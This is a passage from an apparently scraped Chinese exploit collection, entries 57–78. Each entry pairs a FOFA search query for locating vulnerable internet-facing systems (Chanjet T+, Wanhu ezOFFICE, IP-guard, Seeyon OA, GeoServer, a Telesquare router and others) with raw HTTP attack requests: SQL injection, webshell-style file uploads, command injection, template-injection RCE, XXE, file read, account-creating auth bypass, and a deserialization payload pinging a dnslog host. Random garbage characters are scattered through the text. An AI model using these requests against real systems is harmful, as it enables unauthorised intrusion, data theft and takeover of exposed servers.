"MethodName":"Start",+ f5 S5 i5 ]' o$ ~# ?
"ObjectInstance":{
3 h& x" i: P2 L5 x9 b) ?2 L9 J# S4 N "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",) R7 D* L) V% |
"StartInfo": {* d2 p7 q. h; T3 |% W& {
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",: w8 l/ ~! ~$ a( U& k: _8 K; _
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
; T* W% Q# C9 u, l, ~! }/ z }$ n& [# Q4 O) z* V2 p. n
}! g' ?4 y+ C6 e7 ]! c0 k% `0 R; T
}
1 U( y6 s1 |! T8 o}
# T T! ~% l- U0 t9 p0 R' q( U2 o. p4 e9 t
' E1 R& l5 Q5 Y
57. 畅捷通T+ keyEdit.aspx SQL注入3 i# j8 H5 v; v8 \: Z4 T! R
FOFA:app="畅捷通-TPlus"; V S7 @* y# K7 k i% S
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
: B P* |7 u' s4 p2 uHost: host% A. \! w3 ~% a% S
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.361 `* ^$ t4 v) k0 i6 B4 Z- P6 k* o# k
Accept-Charset: utf-82 C8 R) i0 O8 h. I( {
Accept-Encoding: gzip, deflate
/ f6 S( w$ l1 aConnection: close
# C9 l" p& p: V2 h9 h" T! V* H7 U, X. h. h) F/ N& v3 g. t
+ H) V" B+ n# W58. 畅捷通T+ KeyInfoList.aspx sql注入
* ^* R/ ?& n3 U' h }/ [ ]FOFA:app="畅捷通-TPlus"
& S! c) z; i9 b8 d4 I: tGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1+ }, @; Y3 i" ?: y1 U
Host: your-ip: l( a7 i2 ?5 N* w- V! x& ~7 T0 w
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 t0 q2 k( @$ M* Y1 R+ q
Accept-Charset: utf-8
4 m* \9 f$ K O/ iAccept-Encoding: gzip, deflate
4 X! W* D6 ?% I+ T% YConnection: close$ q$ { w+ d, T' \1 v, C
9 K6 t& j3 H( J( C* Z; Z; c2 {; j
9 M: {0 B1 Y! \/ F( p+ E
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
7 j* [4 P5 ^% K! z4 `FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"4 }1 ?1 [$ d. X
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.14 I7 ^5 W' V8 ~/ u* ^$ |
Host: 192.168.86.128:9090
1 T7 Y: K4 _) SUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
" e/ [! y3 i4 X" \$ kConnection: close
* H x( u6 m+ W% W) FContent-Length: 16697 P- @( Z/ M" z* T) Y7 U" \% G
Accept: */*6 {- L- H. O. \- {- [" X
Accept-Language: en0 c3 W' |) _! B( H6 ~2 I
Content-Type: application/x-www-form-urlencoded
~3 v7 Z/ t( ^& yAccept-Encoding: gzip
* ?/ E2 ?! ]# |, ^. m8 @7 i
1 L; u! O4 c" i+ B) Q3 A) TPAYLOAD
( n/ x# Y' H* K5 V
. e8 K( e9 U: e1 c, \# E r# D/ D6 S7 u5 l! g& q$ C- T
60. 百卓Smart管理平台 importexport.php SQL注入5 p4 h; V) j$ V0 Q8 @* K9 d/ t8 s! k
FOFA:title="Smart管理平台"
4 V3 L! l4 [. a& c7 i3 J) t5 v! tGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1, j- H% U* q' \. l& z
Host:
: }( E. g8 _7 a; BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.364 u. r# H) t" A: B1 j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; N4 d5 k) w" l; b9 j
Accept-Encoding: gzip, deflate I9 |8 ~3 C" O. S: P& q3 u) o, T
Accept-Language: zh-CN,zh;q=0.9
. A5 Z9 e2 t) [6 @! R6 VConnection: close
% ?" q ^/ }4 O% I- N
. J/ _ E5 V8 m+ p* m
% ~# `( ]* \- I, q% @61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
2 E# w; Y' Y2 C% M" @; Z* b0 ^FOFA: title="欢迎使用浙大恩特客户资源管理系统"
& t$ p5 N D0 U) P8 R1 ZPOST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.18 t6 q0 G- n$ F7 ~0 I/ }
Host: x.x.x.x4 N9 Q" C2 T; Y8 Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 @0 e y; v7 K) jConnection: close: u- O+ s2 ?* R4 B
Content-Length: 27+ D; y; f' ?2 V2 }$ _5 H
Accept: */*: V% N; D& x) E4 b2 V" Y' k& G
Accept-Encoding: gzip, deflate {) G% ]/ u4 h9 I5 ~+ N8 N
Accept-Language: en+ V' U/ E' F) `5 d7 F% L7 Q! G% f! w
Content-Type: application/x-www-form-urlencoded
, }' d v5 M. V: c# `: Z0 J- X- Z/ Z+ {3 u+ P9 y
8uxssX66eqrqtKObcVa0kid98xa
. q2 }) D4 q2 p# o6 ?7 X: E' }- d6 Q6 t
: Q+ c- K; \+ E# H& E4 e
62. IP-guard WebServer 远程命令执行7 N" j* Z* E# H! P) B9 \1 K7 e
FOFA:"IP-guard" && icon_hash="2030860561"
& s2 \: ]& c& f9 x" U* ]GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
: r: `% k3 ]* V/ @' CHost: x.x.x.x2 h6 L: h) `6 ]7 J+ M" ?
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
5 I( P& U5 A3 f0 C* YConnection: close( W/ g' j. k% `4 J% W* K4 f. T+ T
Accept: */*
6 j! k/ [9 s h5 n3 x2 O% V) S" vAccept-Language: en! Q/ F7 {5 ~2 B7 R* m& B
Accept-Encoding: gzip0 D2 o8 w+ I# @4 y
# N' X4 Y a0 ^- | a( l6 e" S! _* \4 m5 h2 `9 m3 t
访问
1 H: X' |, M$ C! W2 W: T$ P* [' ^
+ X; b+ k. D1 P( ?GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.14 n2 E( j2 _6 E7 g
Host: x.x.x.x: |( [. n3 Q4 W [' Q, P
# p& i" p/ h, X% ?0 r" [
" c3 l, `- R; p0 W& i63. IP-guard WebServer任意文件读取
. `& @1 A, i$ S3 gIP-guard < 4.82.0609.0
7 s0 I; V* d9 G2 QFOFA:icon_hash="2030860561" h) k* e% K" v# G
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
3 Z0 ?' w) U0 i/ |8 _$ }9 h, \ Z# N0 VHost: your-ip
! U* ?2 _* O2 ^5 `/ A* qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36# B; f3 D6 m0 k; X- ~3 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ @$ \$ I% U/ C
Accept-Encoding: gzip, deflate9 v0 m% H1 i' b- d/ m {
Accept-Language: zh-CN,zh;q=0.9
- _. W! P- l" x+ N C: |Connection: close
5 x7 Q0 g M4 s0 ^ xContent-Type: application/x-www-form-urlencoded
6 O; i# k6 }* h2 L+ {. ]
b. m: J5 Y- z/ K8 G2 Ypath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
5 w- _+ }/ r( P4 R) C
6 e+ w# P5 n" I: w64. 捷诚管理信息系统CWSFinanceCommon SQL注入- {4 t* R( F+ o7 o; g2 K8 B# g
FOFA:body="/Scripts/EnjoyMsg.js"
1 A4 K: C, l% G6 vPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
8 }+ ~& A$ d) K) _Host: 192.168.86.128:9001; V9 M1 c& z& l! C0 m% @
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36+ F5 ?/ T) a2 \3 `
Connection: close
8 e$ j4 y; J% v6 m4 mContent-Length: 369
: B& l" E, r# E' n. f4 @Accept: */*" _, k) n$ D1 M- B! A4 p) j# h
Accept-Language: en' q6 y; _1 v1 y
Content-Type: text/xml; charset=utf-8
- [* R$ G9 U Y% S" e& RAccept-Encoding: gzip0 c5 Z$ h! Y$ P/ W
# N: K b6 Q2 Q- @
<?xml version="1.0" encoding="utf-8"?>
; Q' L* y% C, Q2 c<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">3 R- v( `1 l" _
<soap:Body>
/ |" V! H1 Y9 `4 j; S <GetOSpById xmlns="http://tempuri.org/">
+ i6 i; Q9 ]5 S# u* | <sId>1';waitfor delay '0:0:5'--+</sId>( l* n, Q5 ~" H+ o; j5 F& s: g# `0 W
</GetOSpById>$ f1 G3 H0 B: Q) z
</soap:Body>
: p" l) q! R0 l/ `4 b+ ]0 ^' |</soap:Envelope>
* @) i5 W# I* d/ M0 s0 W. O$ T w- u
/ v6 `# C' a9 A/ |
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
' l. C+ Z9 H5 c$ O8 mFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"' Z7 M! t r( @# `8 n3 q D5 _" V
响应200即成功创建账号test123456/123456* q9 }" M0 n1 I3 N0 x6 ?
POST /SystemMng.ashx HTTP/1.1
4 W' A% z# g" I' [Host:
1 _! I; P% C# w! w! d! EUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
) n6 E8 K/ v% p* m% o+ o0 P; N0 ^- EAccept-Encoding: gzip, deflate
! \- N/ g8 Q1 r, P# PAccept: */*
6 V0 N- T, s/ l6 j8 O& eConnection: close
' B* Z; s% N2 h# E; g: _8 @Accept-Language: en
- p/ A! F7 z; \. b6 E& gContent-Length: 174
& W4 }) a9 M0 Y" h' u+ W, ~0 v
; V( }5 Q# G3 E; k. o) M6 poperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators' ~' Y3 N3 O# P. b0 \
# m! [+ s X" r% H5 s5 J: e- M
8 ^# E8 d/ I2 u66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
( M4 S4 X* C2 G8 QFOFA:app="万户ezOFFICE协同管理平台"
. d9 g5 T5 ^2 e5 ~2 w( k7 Q
! c- A" D2 ]! ^8 [5 MGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
& }1 N8 q1 z/ n2 D$ aHost: x.x.x.x. U0 L7 r' A$ O- m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
) O) f7 S; a2 R$ I; K* VConnection: close
; Y: O7 q: U7 RAccept: */*
6 t ^1 o' d+ K, Q% G9 E5 XAccept-Language: en
( b" V8 Y# s5 V0 m* w) eAccept-Encoding: gzip
0 {% [3 }1 a9 H; D$ g- q/ S: P6 o3 Y |6 ~+ d: n I
" ~- E. [1 a4 H
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
0 E- O- I; L9 \. z* s- Y. F# @! n. j3 j2 x3 Z
67. 万户ezOFFICE wpsservlet任意文件上传7 X% O* L1 M5 D1 m X
FOFA:app="万户网络-ezOFFICE"
& I+ D% G% o% S/ ?' E+ L% k. Y$ }newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型2 x* y/ d6 [: J
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
' @4 B% G; ?3 tHost: x.x.x.x" e6 O- g% _8 Y3 E* n9 k4 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0$ G, D0 O7 y% f6 v
Content-Length: 173
4 O* D' D- ~. j% z# L. j( ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8; Z" R ~2 F0 o5 L
Accept-Encoding: gzip, deflate
2 p8 M8 d% J/ p7 \0 S7 Q/ x$ aAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3. z8 y6 F# J9 v2 U: R @
Connection: close- y& g* ?! C9 }- v( ?
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
0 F. U6 W2 Q0 vDNT: 1% j3 h7 z7 h- x4 `
Upgrade-Insecure-Requests: 16 g' c! X3 n9 @+ w& X
! i8 g9 |+ a! c. S3 }--ufuadpxathqvxfqnuyuqaozvseiueerp
% Z) @2 A. E/ @5 y) s& `Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp". R' B! \6 b' }6 \( ^; }0 U. @- M
& @3 {! n$ S& C5 u) A9 v" y<% out.print("sasdfghjkj");%>
( b. v9 m% d+ k2 x3 c$ _--ufuadpxathqvxfqnuyuqaozvseiueerp--
. @7 m/ `! o- t, @! k9 o9 n, G. B, i6 B6 m8 h2 D% Q0 U
) I# d$ z1 N& `文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp+ ~ x M6 i9 y' P( r
, g% V) X) B! V1 ~7 Z68. 万户ezOFFICE wf_printnum.jsp SQL注入+ e- J H1 t9 d# D, n$ F0 y8 H
FOFA:app="万户ezOFFICE协同管理平台"; ^3 q$ M7 V0 A F/ S) I
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.10 g# p; ?" L, A! U2 a( S
Host: {{host}}4 y& q& J0 d7 u5 P+ e" h0 `0 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
: \- w5 V/ y }9 M& U+ @Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
% E% E9 N- W1 b% `- ]Accept-Encoding: gzip, deflate2 S2 b* U, B+ V5 l9 r
Accept-Language: zh-CN,zh;q=0.9) o) ]; Q* C$ b0 r5 ?' b$ t9 l
Connection: close
! t; |- d, ?: }- ?7 o# y+ N" o! m& ?3 r$ S7 }. D! H
+ J3 R3 H1 i4 _4 r' Q! E69. 万户 ezOFFICE contract_gd.jsp SQL注入
& ^/ O' d) |6 W F. K( t2 NFOFA:app="万户ezOFFICE协同管理平台"
; R! H/ q% S6 | M1 [& bGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1: s, y( S4 P+ _0 Q0 [
Host: your-ip9 F' R+ A, a3 A& n( `! [
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36, N2 x5 n- f0 p
Accept-Encoding: gzip, deflate
. Z6 S$ L3 t, g( u+ K7 KAccept: */*
! ^7 j' z" a! fConnection: keep-alive
% G# ^* K C1 u3 l
( j0 W$ |$ V9 W. _8 x5 T5 v( s% N
$ G2 N' t7 E7 o# H7 N8 A70. 万户ezEIP success 命令执行( ]! D! c# k) w$ {
FOFA:app="万户网络-ezEIP"
2 P8 o+ ~- M1 v, v2 cPOST /member/success.aspx HTTP/1.1; v3 g- d8 r/ L/ c. [( ~6 s
Host: {{Hostname}}! D" y: r; F/ e( W" r2 _1 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36" s0 d: P* |' I+ f; ^( t+ o% M# R
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=8 r! R; d/ ~4 g; X+ Y
Content-Type: application/x-www-form-urlencoded) W: t+ u8 D8 n1 l5 i+ z
TYPE: C
& ^! x6 ~7 g kContent-Length: 16702
/ @3 g( a# C3 |3 ^9 W4 O7 y
: D: h5 l* u8 p) D__VIEWSTATE=PAYLOAD/ X' x* U0 _0 \# e3 l3 O. R
9 l. ~( t! B* y, }% Y6 ^
8 P* }* b' H7 T6 U5 R, u' v% ^71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
. A. `1 H: F! T7 |7 J, z1 w4 gFOFA:body="PM2项目管理系统BS版增强工具.zip"" d$ G2 J/ z! N8 l A
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1) M' V: A* G `0 X
Host: x.x.x.xx.x.x.x, |/ N* M: @( X9 W0 s0 T; B j& s
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
) d; y6 P& o0 G9 g. jConnection: close7 F3 Z1 B3 u3 ]% j3 S: h' r7 d) S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( F; x+ v" H8 M) ]* xAccept-Encoding: gzip, deflate" }' ~3 N' Y# W2 o8 U+ \8 r, h, y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; f" Q' X& |: B) i% kUpgrade-Insecure-Requests: 19 _; V: L. N/ c4 k+ X
' Q$ f ^+ e. ^" a( v/ w, F+ \& n7 w# W1 y" k9 { c; o
72. 致远OA getAjaxDataServlet XXE
8 O: y2 @/ T9 [+ u9 q/ e" z zFOFA:app="致远互联-OA"
$ Z$ Z# f' K/ P k' h x- NPOST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
) X, I% ~) l! M0 C' nHost: 192.168.40.131:8099
% w+ Y& l5 z$ f& i2 ^: g- x, @User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 |9 N0 d! X8 c& ~* \
Connection: close; i; e3 i; }9 y. |' o! L! S
Content-Length: 583' }; H1 F3 g4 J! }7 n5 E
Content-Type: application/x-www-form-urlencoded
}/ U+ @/ e/ H3 S. Q# d; Q" QAccept-Encoding: gzip7 ^3 h& y2 u: j C
6 i/ w6 y ^% X, c. fS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
- c% ?7 m ~& B& b. ~: l
* u7 O* j5 j% V% x5 A
% h0 o% |5 g2 w73. GeoServer wms远程代码执行
. s6 e; l, C+ LFOFA:icon_hash=”97540678” x+ y" B, l z6 O; B: A
POST /geoserver/wms HTTP/1.18 V. k; b4 r% v' R. P- m5 x
Host:1 b) T O& W" s# j# c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
. U( m/ h$ B) _- R! m, pContent-Length: 1981
7 p# L2 R: k# c8 d) hAccept-Encoding: gzip, deflate
6 o# u1 T* r8 m8 r- qConnection: close( G/ V7 X& j) n0 p: r" |9 s; m
Content-Type: application/xml
. z. \: `4 _1 M! e: ~; V5 \( O. `SL-CE-SUID: 34 |0 V$ M G9 F+ }5 l7 u
: n$ ^& A, N8 E- M$ i- C1 _) EPAYLOAD
; O4 T. x2 n2 k8 J9 y5 y `; M0 g* n4 ?8 Y
/ Y4 E( o( @ a* a" g& K2 [74. 致远M3-server 6_1sp1 反序列化RCE) U- i2 ?' M- G, x
FOFA:title="M3-Server"
2 ~1 g. G. ]9 W( ]- A7 b/ yPAYLOAD
; Z0 P: s- v# i0 C, `& G0 _+ P" j% D) V, L$ r
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
- J' [4 Z+ l: \9 O7 _# H1 k# JFOFA:app="TELESQUARE-TLR-2005KSH"
; Q3 \$ h& i" c- TGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.16 ^+ l$ B' M) |* r2 H' T
Host: x.x.x.x
9 W& G& x% w) V6 c( S/ d4 ^7 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36: p. Z" k5 [7 L
Connection: close
# Z6 C- B0 U8 m; y" E- IAccept: */*2 {6 M1 M1 _( z
Accept-Language: en+ U( Z( H, }: d% g2 b; a) I
Accept-Encoding: gzip5 [1 u1 O" _ w2 v" y$ k6 W) o1 m# i
7 C3 Q' { X0 ~5 ~3 h1 B
( y* i7 p* o0 E4 f5 QGET /cgi-bin/test28256.txt HTTP/1.1* L7 m; D2 B$ q* M: x3 [
Host: x.x.x.x
5 V0 R8 _: d8 g, x" E! [# Y
% _) w( B1 n3 x) H$ S
9 N3 o5 h* Y- G, J7 H+ v76. 新开普掌上校园服务管理平台service.action远程命令执行, H' c/ w, f0 G5 ^: T
FOFA:title="掌上校园服务管理平台"* q! q+ A, C8 o; v! A+ e
POST /service_transport/service.action HTTP/1.1
Y( P) w) P4 xHost: x.x.x.x3 z- q* |; v) \% m3 `7 X. ^6 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0; S7 O' I( ~: O$ t, c( q: Q0 s
Connection: close
; x) e& F% @% c. d! Q. V% G% V2 d1 LContent-Length: 211' ~& J( l! K. V2 X8 r2 i& _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ s. [( X/ o+ h$ T- i
Accept-Encoding: gzip, deflate' r- U) G7 n7 Z8 U% z2 \7 ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& S! e+ t: n _6 |9 y4 N/ f- uCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4" _- z7 E; g+ l* y2 j: W
Upgrade-Insecure-Requests: 1
: {- A+ |5 l# x7 [) `" p8 ^3 P% i7 m6 F/ ?$ h0 u( g
{ h. L% Z7 [- }, O( V
"command": "GetFZinfo",
- C# y, C) b; ~+ Z/ a5 b; E7 Q) |6 k "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"2 y3 r/ t" A8 p3 j
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
3 c7 k: x1 D I$ l; Y- M$ w" Y}
* a1 S N( f* a: I. s- O& L" `4 @6 o+ F5 t
) Z8 e6 v c; \5 d! S
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1+ _8 z1 C! z) u4 W2 x
Host: x.x.x.x
0 {* g) B' h4 o6 P
2 w/ I7 _$ d* c1 @$ y! y3 Y5 z! O- V. g6 ?
_3 F3 W- p5 j0 z9 ?4 T% ^5 G3 H
77. F22服装管理软件系统UploadHandler.ashx任意文件上传2 ~( N/ j/ d% s2 ~( H6 B8 i0 [
FOFA:body="F22WEB登陆"
3 R# p0 c- @$ J5 \POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1( W( i$ ^) U" a$ _# a
Host: x.x.x.x
9 k M+ v7 l( T7 D+ @/ D) P' a p! aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
9 U* |2 p0 e! C4 E mConnection: close6 @, e2 e1 [2 n& I- u9 W+ `
Content-Length: 433
2 ~! p' \# g4 pAccept: */*
8 l D. q- L4 [. @4 RAccept-Encoding: gzip, deflate$ Q' o4 f2 X0 t6 ]+ h! F3 Q
Accept-Language: zh-CN,zh;q=0.9
+ j2 Q- R. B" l% [Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix n- v, j( `7 B+ ?; D
6 q' h* j1 _" m2 ? E7 I
------------398jnjVTTlDVXHlE7yYnfwBoix
' Z7 x: R* R9 @: R8 CContent-Disposition: form-data; name="folder"
, t2 G& n# D. N( E( \$ o
3 K# E; m' I" X/ d3 Y/upload/udplog
8 f# W. G- L' z% ?4 V/ H------------398jnjVTTlDVXHlE7yYnfwBoix& y- Q# ]- [' p* U
Content-Disposition: form-data; name="Filedata"; filename="1.aspx". @2 [, g7 |: c& n
Content-Type: application/octet-stream. y* w# r6 L3 H
4 v* r9 s. ?' X! Lhello1234567( V% C( Q' d0 g/ |9 `) `4 S9 D
------------398jnjVTTlDVXHlE7yYnfwBoix- M8 I) l7 N4 F% C M7 h$ A3 Q
Content-Disposition: form-data; name="Upload"
4 Y; a: g( N. Z/ o6 b/ u" |" \( k' b$ a# Q
Submit Query( y$ U- L1 n/ B/ T8 ~
------------398jnjVTTlDVXHlE7yYnfwBoix--
1 O2 k( N9 b# [ J9 q* g- S3 [9 x; H( G
! q- K7 D- t. d# V5 n
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
3 T: _( A$ N4 ~! g7 M6 ZFOFA:icon_hash="2001627082"2 N7 Y9 y0 V: u R" S& P
POST /Platform/System/FileUpload.ashx HTTP/1.1
% J4 T: X9 c6 \8 ]4 P$ fHost: x.x.x.x
" _5 Z+ f' _8 F- GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.156 @/ n& u+ \: ~, \" |; d1 x) K
Connection: close
, w2 H% N) T* i. _, u3 LContent-Length: 336
4 e+ ]/ Y4 ^5 y3 J d1 p- v% I A. tAccept-Encoding: gzip
6 K. \! D# V( m- a/ V7 l4 s; XContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
V/ _. E+ ~) y9 N2 U, T8 ^, K1 R+ Y* z! [& Q1 N; o3 D% G4 v7 g# o) I& o0 f
------YsOxWxSvj1KyZow1PTsh98fdu6l
' O3 D) H& r6 w6 qContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"1 i. Y3 u5 f& z. b$ K3 W1 C
Content-Type: image/png" _5 s& F$ d$ U2 |
# q* }& ]8 ^/ y+ c/ F1 B: r- t6 i
YsOxWxSvj1KyZow1PTsh98fdu6l! C. Y k( x/ Z6 \4 S5 ?
------YsOxWxSvj1KyZow1PTsh98fdu6l
: n- x# |& ~( VContent-Disposition: form-data; name="target"% h9 J6 v8 ]8 F) S M+ ?( F
8 |7 l/ X4 K2 q0 J* \. p o
/Applications/SkillDevelopAndEHS/2 z. ~% C& A, c$ v! }) N" Y
------YsOxWxSvj1KyZow1PTsh98fdu6l--4 c/ q2 i ] ?# }, K
1 u1 J1 N+ X1 W* e
/ w; g# _; G" dGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1& R) T$ _+ g$ ?0 H5 T
Host: x.x.x.x
" L& J7 v! g) I& q! e: V1 G( {0 F& g
' g8 c! {) j @: D8 t
